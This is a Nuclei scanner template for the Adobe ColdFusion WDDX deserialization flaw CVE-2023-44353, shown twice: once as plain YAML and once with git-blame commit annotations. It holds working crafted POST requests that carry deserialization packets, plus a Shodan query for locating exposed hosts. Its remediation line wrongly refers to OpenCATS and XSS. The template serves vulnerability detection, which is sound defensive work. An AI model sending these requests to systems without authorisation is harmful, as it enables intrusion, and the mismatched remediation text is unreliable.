nuclei-templates/http/cves/2023/CVE-2023-44353.yaml

id: CVE-2023-44353

info:
  name: Adobe ColdFusion WDDX Deserialization Gadgets
  author: salts
  severity: critical
  description: |
     Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44353
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
    - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 9.8
    cve-id: CVE-2023-44353
    cwe-id: CWE-502
    epss-score: 0.00227
    epss-percentile: 0.60906
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: adobe
    product: coldfusion
    shodan-query: http.component:"Adobe ColdFusion"
  tags: cve,cve2023,adobe,coldfusion,deserialization

variables:
  windows_known_path: "C:\\Windows\\"
  windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
  linux_known_path: "/etc/"
  linux_bad_path: "/thesecretcowlevelisreal/"

http:
  - raw:
      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>

    matchers-condition: or
    matchers:
      - type: dsl
        name: windows
        dsl:
          - "status_code_1 == 500 && status_code_2 == 404"
          - contains(body_1, "coldfusion.runtime")
        condition: and

      - type: dsl
        name: linux
        dsl:
          - "status_code_3 == 500 && status_code_4 == 404"
          - contains(body_3, "coldfusion.runtime")
        condition: and
# digest: 4a0a00473045022100c8479fb72fbbe43698045618ddde551327889a7086a1f257c83adb66e48cf20502207277ec6dfdc26529ce63b304f3e66de222c5d40327a607752e5c31b26e8a8768:922c64590222798bb761d5b6d8e72950
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`id: CVE-2023-44353`

			`info:`
matcher & path update 2024-01-06 20:24:38 +00:00			`name: Adobe ColdFusion WDDX Deserialization Gadgets`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`author: salts`
			`severity: critical`
			`description: \|`
matcher & path update 2024-01-06 20:24:38 +00:00			`Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.`
			`remediation: \|`
			`To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`reference:`
matcher & path update 2024-01-06 20:24:38 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-44353`
			`- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py`
matcher & path update 2024-01-06 20:24:38 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`cvss-score: 9.8`
matcher & path update 2024-01-06 20:24:38 +00:00			`cve-id: CVE-2023-44353`
			`cwe-id: CWE-502`
			`epss-score: 0.00227`
			`epss-percentile: 0.60906`
			`cpe: cpe:2.3:a:adobe:coldfusion::::::::`
			`metadata:`
			`verified: true`
			`max-request: 4`
			`vendor: adobe`
			`product: coldfusion`
			`shodan-query: http.component:"Adobe ColdFusion"`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`tags: cve,cve2023,adobe,coldfusion,deserialization`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`variables:`
			`windows_known_path: "C:\\Windows\\"`
			`windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"`
trailspace fix 2024-01-06 20:27:54 +00:00			`linux_known_path: "/etc/"`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`linux_bad_path: "/thesecretcowlevelisreal/"`
matcher & path update 2024-01-06 20:24:38 +00:00
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`http:`
			`- raw:`
			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`
content-type fix 2024-01-06 20:30:12 +00:00
matcher & path update 2024-01-06 20:24:38 +00:00			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`
content-type fix 2024-01-06 20:30:12 +00:00
matcher & path update 2024-01-06 20:24:38 +00:00			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>`

Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`
matcher & path update 2024-01-06 20:24:38 +00:00
			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`

matcher & path update 2024-01-06 20:24:38 +00:00			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>`

Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`matchers-condition: or`
			`matchers:`
			`- type: dsl`
matcher & path update 2024-01-06 20:24:38 +00:00			`name: windows`
trailspace fix 2024-01-06 20:27:54 +00:00			`dsl:`
matcher & path update 2024-01-06 20:24:38 +00:00			`- "status_code_1 == 500 && status_code_2 == 404"`
			`- contains(body_1, "coldfusion.runtime")`
			`condition: and`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`- type: dsl`
matcher & path update 2024-01-06 20:24:38 +00:00			`name: linux`
trailspace fix 2024-01-06 20:27:54 +00:00			`dsl:`
matcher & path update 2024-01-06 20:24:38 +00:00			`- "status_code_3 == 500 && status_code_4 == 404"`
			`- contains(body_3, "coldfusion.runtime")`
			`condition: and`
Auto Template Signing [Mon Jan 8 07:25:24 UTC 2024] :robot: 2024-01-08 07:25:24 +00:00			`# digest: 4a0a00473045022100c8479fb72fbbe43698045618ddde551327889a7086a1f257c83adb66e48cf20502207277ec6dfdc26529ce63b304f3e66de222c5d40327a607752e5c31b26e8a8768:922c64590222798bb761d5b6d8e72950`